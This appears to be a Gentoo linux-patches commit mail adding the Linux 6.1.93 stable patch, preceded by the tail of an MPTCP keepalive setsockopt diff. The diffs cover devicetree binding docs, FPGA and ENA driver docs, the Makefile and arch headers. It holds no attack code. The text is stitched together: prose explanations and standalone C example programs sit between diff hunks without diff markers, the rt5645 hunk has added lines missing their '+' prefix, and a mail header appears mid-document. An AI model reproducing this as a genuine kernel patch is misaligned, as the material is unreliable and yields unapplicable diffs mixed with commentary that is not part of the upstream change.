+-		if (val < 0 || val > 1)
+-			return -EINVAL;
+-
+-		lock_sock(sk);
+-		msk->recvmsg_inq = !!val;
+-		release_sock(sk);
+-		return 0;
+ 	case TCP_ULP:
+ 		return -EOPNOTSUPP;
+ 	case TCP_CONGESTION:
+ 		return mptcp_setsockopt_sol_tcp_congestion(msk, optval, optlen);
+-	case TCP_CORK:
+-		return mptcp_setsockopt_sol_tcp_cork(msk, optval, optlen);
+-	case TCP_NODELAY:
+-		return mptcp_setsockopt_sol_tcp_nodelay(msk, optval, optlen);
+ 	case TCP_DEFER_ACCEPT:
+ 		return mptcp_setsockopt_sol_tcp_defer(msk, optval, optlen);
+ 	case TCP_FASTOPEN_CONNECT:
+@@ -823,7 +833,46 @@ static int mptcp_setsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 						      optval, optlen);
+ 	}
+ 
+-	return -EOPNOTSUPP;
++	ret = mptcp_get_int_option(msk, optval, optlen, &val);
++	if (ret)
++		return ret;
++
++	lock_sock(sk);
++	switch (optname) {
++	case TCP_INQ:
++		if (val < 0 || val > 1)
++			ret = -EINVAL;
++		else
++			msk->recvmsg_inq = !!val;
++		break;
++	case TCP_CORK:
++		ret = __mptcp_setsockopt_sol_tcp_cork(msk, val);
++		break;
++	case TCP_NODELAY:
++		ret = __mptcp_setsockopt_sol_tcp_nodelay(msk, val);
++		break;
++	case TCP_KEEPIDLE:
++		ret = __mptcp_setsockopt_set_val(msk, MAX_TCP_KEEPIDLE,
++						 &tcp_sock_set_keepidle_locked,
++						 &msk->keepalive_idle, val);
++		break;
++	case TCP_KEEPINTVL:
++		ret = __mptcp_setsockopt_set_val(msk, MAX_TCP_KEEPINTVL,
++						 &__tcp_sock_set_keepintvl,
++						 &msk->keepalive_intvl, val);
++		break;
++	case TCP_KEEPCNT:
++		ret = __mptcp_setsockopt_set_val(msk, MAX_TCP_KEEPCNT,
++						 &__tcp_sock_set_keepcnt,
++						 &msk->keepalive_cnt,
++						 val);
++		break;
++	default:
++		ret = -ENOPROTOOPT;
++	}
++
++	release_sock(sk);
++	return ret;
+ }
+ 
+ int mptcp_setsockopt(struct sock *sk, int level, int optname,
+@@ -1176,6 +1225,8 @@ static int mptcp_put_int_option(struct mptcp_sock *msk, char __user *optval,
+ static int mptcp_getsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 				    char __user *optval, int __user *optlen)
+ {
++	struct sock *sk = (void *)msk;
++
+ 	switch (optname) {
+ 	case TCP_ULP:
+ 	case TCP_CONGESTION:
+@@ -1191,6 +1242,18 @@ static int mptcp_getsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 		return mptcp_put_int_option(msk, optval, optlen, msk->cork);
+ 	case TCP_NODELAY:
+ 		return mptcp_put_int_option(msk, optval, optlen, msk->nodelay);
++	case TCP_KEEPIDLE:
++		return mptcp_put_int_option(msk, optval, optlen,
++					    msk->keepalive_idle ? :
++					    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_keepalive_time) / HZ);
++	case TCP_KEEPINTVL:
++		return mptcp_put_int_option(msk, optval, optlen,
++					    msk->keepalive_intvl ? :
++					    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_keepalive_intvl) / HZ);
++	case TCP_KEEPCNT:
++		return mptcp_put_int_option(msk, optval, optlen,
++					    msk->keepalive_cnt ? :
++					    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_keepalive_probes));
+ 	}
+ 	return -EOPNOTSUPP;
+ }
+@@ -1295,6 +1358,9 @@ static void sync_socket_options(struct mptcp_sock *msk, struct sock *ssk)
+ 		tcp_set_congestion_control(ssk, msk->ca_name, false, true);
+ 	__tcp_sock_set_cork(ssk, !!msk->cork);
+ 	__tcp_sock_set_nodelay(ssk, !!msk->nodelay);
++	tcp_sock_set_keepidle_locked(ssk, msk->keepalive_idle);
++	__tcp_sock_set_keepintvl(ssk, msk->keepalive_intvl);
++	__tcp_sock_set_keepcnt(ssk, msk->keepalive_cnt);
+ 
+ 	inet_sk(ssk)->transparent = inet_sk(sk)->transparent;
+ 	inet_sk(ssk)->freebind = inet_sk(sk)->freebind;
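
The keepalive setters all funnel through __mptcp_setsockopt_set_val(), a fan-out helper: apply the per-socket setter to every subflow, keep the first error, and cache the value on the MPTCP socket only when every subflow accepted it. The same pattern in miniature, with toy types rather than the mptcp structures:

#include <stdio.h>

static int set_member(int *member, int val)
{
	if (val < 1)
		return -1;		/* stand-in for -EINVAL */
	*member = val;
	return 0;
}

static int set_all(int *members, int n, int val, int *cached)
{
	int err = 0;

	for (int i = 0; i < n; i++) {
		int ret = set_member(&members[i], val);
		err = err ? err : ret;	/* keep the first error */
	}
	if (!err)
		*cached = val;		/* commit only on full success */
	return err;
}

int main(void)
{
	int subflows[3] = {0}, cached = 0;

	printf("%d cached=%d\n", set_all(subflows, 3, 7, &cached), cached);
	return 0;
}
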
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index e47c670c7e2cd..5fddde2d5bc48 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3772,15 +3772,10 @@ static void xfrm_link_failure(struct sk_buff *skb)
+ 	/* Impossible. Such dst must be popped before reaches point of failure. */
+ }
+ 
+-static struct dst_entry *xfrm_negative_advice(struct dst_entry *dst)
++static void xfrm_negative_advice(struct sock *sk, struct dst_entry *dst)
+ {
+-	if (dst) {
+-		if (dst->obsolete) {
+-			dst_release(dst);
+-			dst = NULL;
+-		}
+-	}
+-	return dst;
++	if (dst->obsolete)
++		sk_dst_reset(sk);
+ }
+ 
+ static void xfrm_init_pmtu(struct xfrm_dst **bundle, int nr)
+diff --git a/scripts/gdb/linux/constants.py.in b/scripts/gdb/linux/constants.py.in
+index 08f0587d15ea1..0ff707bc18960 100644
+--- a/scripts/gdb/linux/constants.py.in
++++ b/scripts/gdb/linux/constants.py.in
+@@ -46,12 +46,12 @@ if IS_BUILTIN(CONFIG_COMMON_CLK):
+     LX_GDBPARSED(CLK_GET_RATE_NOCACHE)
+ 
+ /* linux/fs.h */
+-LX_VALUE(SB_RDONLY)
+-LX_VALUE(SB_SYNCHRONOUS)
+-LX_VALUE(SB_MANDLOCK)
+-LX_VALUE(SB_DIRSYNC)
+-LX_VALUE(SB_NOATIME)
+-LX_VALUE(SB_NODIRATIME)
++LX_GDBPARSED(SB_RDONLY)
++LX_GDBPARSED(SB_SYNCHRONOUS)
++LX_GDBPARSED(SB_MANDLOCK)
++LX_GDBPARSED(SB_DIRSYNC)
++LX_GDBPARSED(SB_NOATIME)
++LX_GDBPARSED(SB_NODIRATIME)
+ 
+ /* linux/htimer.h */
+ LX_GDBPARSED(hrtimer_resolution)


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-12 10:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-12 10:16 UTC (permalink / raw
  To: gentoo-commits

commit:     2c76c655d5ba0db36c8ad9865ca16b5c0ec9063a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jun 12 10:15:46 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jun 12 10:15:46 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2c76c655

Linux patch 6.1.93

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1092_linux-6.1.93.patch | 17418 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 17422 insertions(+)

diff --git a/0000_README b/0000_README
index 0d537557..87ce6763 100644
--- a/0000_README
+++ b/0000_README
@@ -411,6 +411,10 @@ Patch:  1091_linux-6.1.92.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.92
 
+Patch:  1092_linux-6.1.93.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.93
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1092_linux-6.1.93.patch b/1092_linux-6.1.93.patch
new file mode 100644
index 00000000..b086415a
--- /dev/null
+++ b/1092_linux-6.1.93.patch
@@ -0,0 +1,17418 @@
+diff --git a/Documentation/devicetree/bindings/media/i2c/ovti,ov2680.yaml b/Documentation/devicetree/bindings/media/i2c/ovti,ov2680.yaml
+index cf456f8d9ddcb..c87677f5e2a25 100644
+--- a/Documentation/devicetree/bindings/media/i2c/ovti,ov2680.yaml
++++ b/Documentation/devicetree/bindings/media/i2c/ovti,ov2680.yaml
+@@ -37,15 +37,15 @@ properties:
+       active low.
+     maxItems: 1
+ 
+-  dovdd-supply:
++  DOVDD-supply:
+     description:
+       Definition of the regulator used as interface power supply.
+ 
+-  avdd-supply:
++  AVDD-supply:
+     description:
+       Definition of the regulator used as analog power supply.
+ 
+-  dvdd-supply:
++  DVDD-supply:
+     description:
+       Definition of the regulator used as digital power supply.
+ 
+@@ -59,9 +59,9 @@ required:
+   - reg
+   - clocks
+   - clock-names
+-  - dovdd-supply
+-  - avdd-supply
+-  - dvdd-supply
++  - DOVDD-supply
++  - AVDD-supply
++  - DVDD-supply
+   - reset-gpios
+   - port
+ 
+@@ -82,9 +82,9 @@ examples:
+                 clock-names = "xvclk";
+                 reset-gpios = <&gpio1 3 GPIO_ACTIVE_LOW>;
+ 
+-                dovdd-supply = <&sw2_reg>;
+-                dvdd-supply = <&sw2_reg>;
+-                avdd-supply = <&reg_peri_3p15v>;
++                DOVDD-supply = <&sw2_reg>;
++                DVDD-supply = <&sw2_reg>;
++                AVDD-supply = <&reg_peri_3p15v>;
+ 
+                 port {
+                         ov2680_to_mipi: endpoint {
+diff --git a/Documentation/devicetree/bindings/pci/rcar-pci-host.yaml b/Documentation/devicetree/bindings/pci/rcar-pci-host.yaml
+index 8fdfbc763d704..835b6db00c279 100644
+--- a/Documentation/devicetree/bindings/pci/rcar-pci-host.yaml
++++ b/Documentation/devicetree/bindings/pci/rcar-pci-host.yaml
+@@ -68,6 +68,18 @@ properties:
+   phy-names:
+     const: pcie
+ 
++  vpcie1v5-supply:
++    description: The 1.5v regulator to use for PCIe.
++
++  vpcie3v3-supply:
++    description: The 3.3v regulator to use for PCIe.
++
++  vpcie12v-supply:
++    description: The 12v regulator to use for PCIe.
++
++  iommu-map: true
++  iommu-map-mask: true
++
+ required:
+   - compatible
+   - reg
+@@ -121,5 +133,7 @@ examples:
+              clock-names = "pcie", "pcie_bus";
+              power-domains = <&sysc R8A7791_PD_ALWAYS_ON>;
+              resets = <&cpg 319>;
++             vpcie3v3-supply = <&pcie_3v3>;
++             vpcie12v-supply = <&pcie_12v>;
+          };
+     };
+diff --git a/Documentation/devicetree/bindings/pinctrl/mediatek,mt7622-pinctrl.yaml b/Documentation/devicetree/bindings/pinctrl/mediatek,mt7622-pinctrl.yaml
+index c9ea0cad489b7..3767981409005 100644
+--- a/Documentation/devicetree/bindings/pinctrl/mediatek,mt7622-pinctrl.yaml
++++ b/Documentation/devicetree/bindings/pinctrl/mediatek,mt7622-pinctrl.yaml
+@@ -97,7 +97,8 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [emmc, emmc_rst]
++                  items:
++                    enum: [emmc, emmc_rst]
+           - if:
+               properties:
+                 function:
+@@ -105,8 +106,9 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [esw, esw_p0_p1, esw_p2_p3_p4, rgmii_via_esw,
+-                         rgmii_via_gmac1, rgmii_via_gmac2, mdc_mdio]
++                  items:
++                    enum: [esw, esw_p0_p1, esw_p2_p3_p4, rgmii_via_esw,
++                           rgmii_via_gmac1, rgmii_via_gmac2, mdc_mdio]
+           - if:
+               properties:
+                 function:
+@@ -123,10 +125,11 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [i2s_in_mclk_bclk_ws, i2s1_in_data, i2s2_in_data,
+-                         i2s3_in_data, i2s4_in_data, i2s_out_mclk_bclk_ws,
+-                         i2s1_out_data, i2s2_out_data, i2s3_out_data,
+-                         i2s4_out_data]
++                  items:
++                    enum: [i2s_in_mclk_bclk_ws, i2s1_in_data, i2s2_in_data,
++                           i2s3_in_data, i2s4_in_data, i2s_out_mclk_bclk_ws,
++                           i2s1_out_data, i2s2_out_data, i2s3_out_data,
++                           i2s4_out_data]
+           - if:
+               properties:
+                 function:
+@@ -159,10 +162,11 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [pcie0_0_waken, pcie0_1_waken, pcie1_0_waken,
+-                         pcie0_0_clkreq, pcie0_1_clkreq, pcie1_0_clkreq,
+-                         pcie0_pad_perst, pcie1_pad_perst, pcie_pereset,
+-                         pcie_wake, pcie_clkreq]
++                  items:
++                    enum: [pcie0_0_waken, pcie0_1_waken, pcie1_0_waken,
++                           pcie0_0_clkreq, pcie0_1_clkreq, pcie1_0_clkreq,
++                           pcie0_pad_perst, pcie1_pad_perst, pcie_pereset,
++                           pcie_wake, pcie_clkreq]
+           - if:
+               properties:
+                 function:
+@@ -178,11 +182,12 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [pwm_ch1_0, pwm_ch1_1, pwm_ch1_2, pwm_ch2_0, pwm_ch2_1,
+-                         pwm_ch2_2, pwm_ch3_0, pwm_ch3_1, pwm_ch3_2, pwm_ch4_0,
+-                         pwm_ch4_1, pwm_ch4_2, pwm_ch4_3, pwm_ch5_0, pwm_ch5_1,
+-                         pwm_ch5_2, pwm_ch6_0, pwm_ch6_1, pwm_ch6_2, pwm_ch6_3,
+-                         pwm_ch7_0, pwm_0, pwm_1]
++                  items:
++                    enum: [pwm_ch1_0, pwm_ch1_1, pwm_ch1_2, pwm_ch2_0, pwm_ch2_1,
++                           pwm_ch2_2, pwm_ch3_0, pwm_ch3_1, pwm_ch3_2, pwm_ch4_0,
++                           pwm_ch4_1, pwm_ch4_2, pwm_ch4_3, pwm_ch5_0, pwm_ch5_1,
++                           pwm_ch5_2, pwm_ch6_0, pwm_ch6_1, pwm_ch6_2, pwm_ch6_3,
++                           pwm_ch7_0, pwm_0, pwm_1]
+           - if:
+               properties:
+                 function:
+@@ -260,33 +265,34 @@ patternProperties:
+           pins:
+             description: |
+               An array of strings. Each string contains the name of a pin.
+-            enum: [GPIO_A, I2S1_IN, I2S1_OUT, I2S_BCLK, I2S_WS, I2S_MCLK, TXD0,
+-                   RXD0, SPI_WP, SPI_HOLD, SPI_CLK, SPI_MOSI, SPI_MISO, SPI_CS,
+-                   I2C_SDA, I2C_SCL, I2S2_IN, I2S3_IN, I2S4_IN, I2S2_OUT,
+-                   I2S3_OUT, I2S4_OUT, GPIO_B, MDC, MDIO, G2_TXD0, G2_TXD1,
+-                   G2_TXD2, G2_TXD3, G2_TXEN, G2_TXC, G2_RXD0, G2_RXD1, G2_RXD2,
+-                   G2_RXD3, G2_RXDV, G2_RXC, NCEB, NWEB, NREB, NDL4, NDL5, NDL6,
+-                   NDL7, NRB, NCLE, NALE, NDL0, NDL1, NDL2, NDL3, MDI_TP_P0,
+-                   MDI_TN_P0, MDI_RP_P0, MDI_RN_P0, MDI_TP_P1, MDI_TN_P1,
+-                   MDI_RP_P1, MDI_RN_P1, MDI_RP_P2, MDI_RN_P2, MDI_TP_P2,
+-                   MDI_TN_P2, MDI_TP_P3, MDI_TN_P3, MDI_RP_P3, MDI_RN_P3,
+-                   MDI_RP_P4, MDI_RN_P4, MDI_TP_P4, MDI_TN_P4, PMIC_SCL,
+-                   PMIC_SDA, SPIC1_CLK, SPIC1_MOSI, SPIC1_MISO, SPIC1_CS,
+-                   GPIO_D, WATCHDOG, RTS3_N, CTS3_N, TXD3, RXD3, PERST0_N,
+-                   PERST1_N, WLED_N, EPHY_LED0_N, AUXIN0, AUXIN1, AUXIN2,
+-                   AUXIN3, TXD4, RXD4, RTS4_N, CST4_N, PWM1, PWM2, PWM3, PWM4,
+-                   PWM5, PWM6, PWM7, GPIO_E, TOP_5G_CLK, TOP_5G_DATA,
+-                   WF0_5G_HB0, WF0_5G_HB1, WF0_5G_HB2, WF0_5G_HB3, WF0_5G_HB4,
+-                   WF0_5G_HB5, WF0_5G_HB6, XO_REQ, TOP_RST_N, SYS_WATCHDOG,
+-                   EPHY_LED0_N_JTDO, EPHY_LED1_N_JTDI, EPHY_LED2_N_JTMS,
+-                   EPHY_LED3_N_JTCLK, EPHY_LED4_N_JTRST_N, WF2G_LED_N,
+-                   WF5G_LED_N, GPIO_9, GPIO_10, GPIO_11, GPIO_12, UART1_TXD,
+-                   UART1_RXD, UART1_CTS, UART1_RTS, UART2_TXD, UART2_RXD,
+-                   UART2_CTS, UART2_RTS, SMI_MDC, SMI_MDIO, PCIE_PERESET_N,
+-                   PWM_0, GPIO_0, GPIO_1, GPIO_2, GPIO_3, GPIO_4, GPIO_5,
+-                   GPIO_6, GPIO_7, GPIO_8, UART0_TXD, UART0_RXD, TOP_2G_CLK,
+-                   TOP_2G_DATA, WF0_2G_HB0, WF0_2G_HB1, WF0_2G_HB2, WF0_2G_HB3,
+-                   WF0_2G_HB4, WF0_2G_HB5, WF0_2G_HB6]
++            items:
++              enum: [GPIO_A, I2S1_IN, I2S1_OUT, I2S_BCLK, I2S_WS, I2S_MCLK, TXD0,
++                     RXD0, SPI_WP, SPI_HOLD, SPI_CLK, SPI_MOSI, SPI_MISO, SPI_CS,
++                     I2C_SDA, I2C_SCL, I2S2_IN, I2S3_IN, I2S4_IN, I2S2_OUT,
++                     I2S3_OUT, I2S4_OUT, GPIO_B, MDC, MDIO, G2_TXD0, G2_TXD1,
++                     G2_TXD2, G2_TXD3, G2_TXEN, G2_TXC, G2_RXD0, G2_RXD1, G2_RXD2,
++                     G2_RXD3, G2_RXDV, G2_RXC, NCEB, NWEB, NREB, NDL4, NDL5, NDL6,
++                     NDL7, NRB, NCLE, NALE, NDL0, NDL1, NDL2, NDL3, MDI_TP_P0,
++                     MDI_TN_P0, MDI_RP_P0, MDI_RN_P0, MDI_TP_P1, MDI_TN_P1,
++                     MDI_RP_P1, MDI_RN_P1, MDI_RP_P2, MDI_RN_P2, MDI_TP_P2,
++                     MDI_TN_P2, MDI_TP_P3, MDI_TN_P3, MDI_RP_P3, MDI_RN_P3,
++                     MDI_RP_P4, MDI_RN_P4, MDI_TP_P4, MDI_TN_P4, PMIC_SCL,
++                     PMIC_SDA, SPIC1_CLK, SPIC1_MOSI, SPIC1_MISO, SPIC1_CS,
++                     GPIO_D, WATCHDOG, RTS3_N, CTS3_N, TXD3, RXD3, PERST0_N,
++                     PERST1_N, WLED_N, EPHY_LED0_N, AUXIN0, AUXIN1, AUXIN2,
++                     AUXIN3, TXD4, RXD4, RTS4_N, CST4_N, PWM1, PWM2, PWM3, PWM4,
++                     PWM5, PWM6, PWM7, GPIO_E, TOP_5G_CLK, TOP_5G_DATA,
++                     WF0_5G_HB0, WF0_5G_HB1, WF0_5G_HB2, WF0_5G_HB3, WF0_5G_HB4,
++                     WF0_5G_HB5, WF0_5G_HB6, XO_REQ, TOP_RST_N, SYS_WATCHDOG,
++                     EPHY_LED0_N_JTDO, EPHY_LED1_N_JTDI, EPHY_LED2_N_JTMS,
++                     EPHY_LED3_N_JTCLK, EPHY_LED4_N_JTRST_N, WF2G_LED_N,
++                     WF5G_LED_N, GPIO_9, GPIO_10, GPIO_11, GPIO_12, UART1_TXD,
++                     UART1_RXD, UART1_CTS, UART1_RTS, UART2_TXD, UART2_RXD,
++                     UART2_CTS, UART2_RTS, SMI_MDC, SMI_MDIO, PCIE_PERESET_N,
++                     PWM_0, GPIO_0, GPIO_1, GPIO_2, GPIO_3, GPIO_4, GPIO_5,
++                     GPIO_6, GPIO_7, GPIO_8, UART0_TXD, UART0_RXD, TOP_2G_CLK,
++                     TOP_2G_DATA, WF0_2G_HB0, WF0_2G_HB1, WF0_2G_HB2, WF0_2G_HB3,
++                     WF0_2G_HB4, WF0_2G_HB5, WF0_2G_HB6]
+ 
+           bias-disable: true
+ 
+diff --git a/Documentation/devicetree/bindings/soc/rockchip/grf.yaml b/Documentation/devicetree/bindings/soc/rockchip/grf.yaml
+index 2ed8cca79b59c..e4eade2661f6b 100644
+--- a/Documentation/devicetree/bindings/soc/rockchip/grf.yaml
++++ b/Documentation/devicetree/bindings/soc/rockchip/grf.yaml
+@@ -151,6 +151,7 @@ allOf:
+           unevaluatedProperties: false
+ 
+         pcie-phy:
++          type: object
+           description:
+             Documentation/devicetree/bindings/phy/rockchip-pcie-phy.txt
+ 
+diff --git a/Documentation/devicetree/bindings/sound/rt5645.txt b/Documentation/devicetree/bindings/sound/rt5645.txt
+index 41a62fd2ae1ff..c1fa379f5f3ea 100644
+--- a/Documentation/devicetree/bindings/sound/rt5645.txt
++++ b/Documentation/devicetree/bindings/sound/rt5645.txt
+@@ -20,6 +20,11 @@ Optional properties:
+   a GPIO spec for the external headphone detect pin. If jd-mode = 0,
+   we will get the JD status by getting the value of hp-detect-gpios.
+ 
++- cbj-sleeve-gpios:
+  a GPIO spec to control the external combo-jack circuit that ties the
+  sleeve/ring2 contacts to ground or leaves them floating. This can avoid
+  electrical noise from active speaker jacks.
++
+ - realtek,in2-differential
+   Boolean. Indicate MIC2 input are differential, rather than single-ended.
+ 
+@@ -68,6 +73,7 @@ codec: rt5650@1a {
+ 	compatible = "realtek,rt5650";
+ 	reg = <0x1a>;
+ 	hp-detect-gpios = <&gpio 19 0>;
++	cbj-sleeve-gpios = <&gpio 20 0>;
+ 	interrupt-parent = <&gpio>;
+ 	interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
+ 	realtek,dmic-en = "true";
+diff --git a/Documentation/driver-api/fpga/fpga-region.rst b/Documentation/driver-api/fpga/fpga-region.rst
+index dc55d60a0b4a5..2d03b5fb76575 100644
+--- a/Documentation/driver-api/fpga/fpga-region.rst
++++ b/Documentation/driver-api/fpga/fpga-region.rst
+@@ -46,13 +46,16 @@ API to add a new FPGA region
+ ----------------------------
+ 
+ * struct fpga_region - The FPGA region struct
+-* struct fpga_region_info - Parameter structure for fpga_region_register_full()
+-* fpga_region_register_full() -  Create and register an FPGA region using the
++* struct fpga_region_info - Parameter structure for __fpga_region_register_full()
++* __fpga_region_register_full() -  Create and register an FPGA region using the
+   fpga_region_info structure to provide the full flexibility of options
+-* fpga_region_register() -  Create and register an FPGA region using standard
++* __fpga_region_register() -  Create and register an FPGA region using standard
+   arguments
+ * fpga_region_unregister() -  Unregister an FPGA region
+ 
++Helper macros ``fpga_region_register()`` and ``fpga_region_register_full()``
++automatically set the module that registers the FPGA region as the owner.
++
+ The FPGA region's probe function will need to get a reference to the FPGA
+ Manager it will be using to do the programming.  This usually would happen
+ during the region's probe function.
+@@ -82,10 +85,10 @@ following APIs to handle building or tearing down that list.
+    :functions: fpga_region_info
+ 
+ .. kernel-doc:: drivers/fpga/fpga-region.c
+-   :functions: fpga_region_register_full
++   :functions: __fpga_region_register_full
+ 
+ .. kernel-doc:: drivers/fpga/fpga-region.c
+-   :functions: fpga_region_register
++   :functions: __fpga_region_register
+ 
+ .. kernel-doc:: drivers/fpga/fpga-region.c
+    :functions: fpga_region_unregister
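The helper-macro note above describes a pattern worth spelling out: the wrapper expands at the caller's site, so THIS_MODULE names the module doing the registering before the call is forwarded to a double-underscore function that takes the owner explicitly. A minimal C sketch of the idea (declarations simplified; these are not the exact fpga-region prototypes):

    /* Owner-capturing macro pattern; all declarations simplified. */
    struct device;
    struct module;
    struct fpga_region;
    struct fpga_region_info;

    extern struct module __this_module;
    #define THIS_MODULE (&__this_module)

    /* The underlying registration takes the owning module explicitly. */
    struct fpga_region *
    __fpga_region_register(struct device *parent,
                           const struct fpga_region_info *info,
                           struct module *owner);

    /*
     * The macro expands in the caller's translation unit, so THIS_MODULE
     * resolves to the module that registers the region, not to fpga-region.
     */
    #define fpga_region_register(parent, info) \
            __fpga_region_register(parent, info, THIS_MODULE)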
+diff --git a/Documentation/networking/device_drivers/ethernet/amazon/ena.rst b/Documentation/networking/device_drivers/ethernet/amazon/ena.rst
+index 8bcb173e0353f..4914926776326 100644
+--- a/Documentation/networking/device_drivers/ethernet/amazon/ena.rst
++++ b/Documentation/networking/device_drivers/ethernet/amazon/ena.rst
+@@ -205,6 +205,7 @@ Adaptive coalescing can be switched on/off through `ethtool(8)`'s
+ More information about Adaptive Interrupt Moderation (DIM) can be found in
+ Documentation/networking/net_dim.rst
+ 
++.. _`RX copybreak`:
+ RX copybreak
+ ============
+ The rx_copybreak is initialized by default to ENA_DEFAULT_RX_COPYBREAK
+@@ -315,3 +316,34 @@ Rx
+ - The new SKB is updated with the necessary information (protocol,
+   checksum hw verify result, etc), and then passed to the network
+   stack, using the NAPI interface function :code:`napi_gro_receive()`.
++
++Dynamic RX Buffers (DRB)
++------------------------
++
++Each RX descriptor in the RX ring is a single memory page (either 4KB
++or 16KB long, depending on the system's configuration).
++To reduce the memory allocations required when dealing with a high rate of small
++packets, the driver tries to reuse the remaining space of the RX page if more
++than 2KB of the page remains unused.
++
++A simple example of this mechanism is the following sequence of events:
++
++::
++
++        1. Driver allocates page-sized RX buffer and passes it to hardware
++                +----------------------+
++                |4KB RX Buffer         |
++                +----------------------+
++
++        2. A 300Bytes packet is received on this buffer
++
++        3. The driver increases the ref count on this page and returns it to
++           HW as an RX buffer of size 4KB - 300Bytes = 3796 Bytes
++               +----+--------------------+
++               |****|3796 Bytes RX Buffer|
++               +----+--------------------+
++
++This mechanism isn't used when an XDP program is loaded, or when the
++RX packet is less than rx_copybreak bytes (in which case the packet is
++copied out of the RX buffer into the linear part of a new skb allocated
++for it and the RX buffer remains the same size, see `RX copybreak`_).
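A rough userspace model of the buffer-reuse accounting described above (purely illustrative; the struct and function names are invented, not the ENA driver's):

    #include <stdio.h>

    #define PAGE_SIZE 4096
    #define REUSE_MIN 2048  /* no reuse if less than 2KB remains */

    struct rx_buf {
            int refcount;   /* models the page reference count */
            int used;       /* bytes already handed to the stack */
    };

    /* Consume len bytes; return 1 if the page goes back to HW. */
    static int rx_buf_consume(struct rx_buf *b, int len)
    {
            b->used += len;
            if (PAGE_SIZE - b->used > REUSE_MIN) {
                    b->refcount++;  /* page stays alive for the next packet */
                    return 1;
            }
            return 0;
    }

    int main(void)
    {
            struct rx_buf b = { .refcount = 1, .used = 0 };

            if (rx_buf_consume(&b, 300))
                    printf("reused: %d bytes left, refcount %d\n",
                           PAGE_SIZE - b.used, b.refcount);
            return 0;
    }

Run against the example above, this prints 3796 bytes left with a reference count of 2, matching the sequence in the documentation.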
+diff --git a/Makefile b/Makefile
+index 0be668057cb2a..c5147f1c46f87 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 92
++SUBLEVEL = 93
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/configs/sunxi_defconfig b/arch/arm/configs/sunxi_defconfig
+index bddc82f789421..a83d29fed1756 100644
+--- a/arch/arm/configs/sunxi_defconfig
++++ b/arch/arm/configs/sunxi_defconfig
+@@ -110,6 +110,7 @@ CONFIG_DRM_PANEL_LVDS=y
+ CONFIG_DRM_PANEL_SIMPLE=y
+ CONFIG_DRM_PANEL_EDP=y
+ CONFIG_DRM_SIMPLE_BRIDGE=y
++CONFIG_DRM_DW_HDMI=y
+ CONFIG_DRM_LIMA=y
+ CONFIG_FB_SIMPLE=y
+ CONFIG_BACKLIGHT_CLASS_DEVICE=y
+diff --git a/arch/arm64/boot/dts/amlogic/meson-s4.dtsi b/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
+index 372a03762d69b..a1c55b047708c 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
+@@ -61,10 +61,15 @@ xtal: xtal-clk {
+ 		#clock-cells = <0>;
+ 	};
+ 
+-	pwrc: power-controller {
+-		compatible = "amlogic,meson-s4-pwrc";
+-		#power-domain-cells = <1>;
+-		status = "okay";
++	firmware {
++		sm: secure-monitor {
++			compatible = "amlogic,meson-gxbb-sm";
++
++			pwrc: power-controller {
++				compatible = "amlogic,meson-s4-pwrc";
++				#power-domain-cells = <1>;
++			};
++		};
+ 	};
+ 
+ 	soc {
+diff --git a/arch/arm64/include/asm/asm-bug.h b/arch/arm64/include/asm/asm-bug.h
+index c762038ba4009..6e73809f6492a 100644
+--- a/arch/arm64/include/asm/asm-bug.h
++++ b/arch/arm64/include/asm/asm-bug.h
+@@ -28,6 +28,7 @@
+ 	14470:	.long 14471f - .;			\
+ _BUGVERBOSE_LOCATION(__FILE__, __LINE__)		\
+ 		.short flags; 				\
++		.align 2;				\
+ 		.popsection;				\
+ 	14471:
+ #else
+diff --git a/arch/loongarch/include/asm/perf_event.h b/arch/loongarch/include/asm/perf_event.h
+index 52b638059e40b..f948a0676daf8 100644
+--- a/arch/loongarch/include/asm/perf_event.h
++++ b/arch/loongarch/include/asm/perf_event.h
+@@ -13,8 +13,7 @@
+ 
+ #define perf_arch_fetch_caller_regs(regs, __ip) { \
+ 	(regs)->csr_era = (__ip); \
+-	(regs)->regs[3] = current_stack_pointer; \
+-	(regs)->regs[22] = (unsigned long) __builtin_frame_address(0); \
++	(regs)->regs[3] = (unsigned long) __builtin_frame_address(0); \
+ }
+ 
+ #endif /* __LOONGARCH_PERF_EVENT_H__ */
+diff --git a/arch/loongarch/kernel/perf_event.c b/arch/loongarch/kernel/perf_event.c
+index 3a2edb157b65a..1563bf47f3e2c 100644
+--- a/arch/loongarch/kernel/perf_event.c
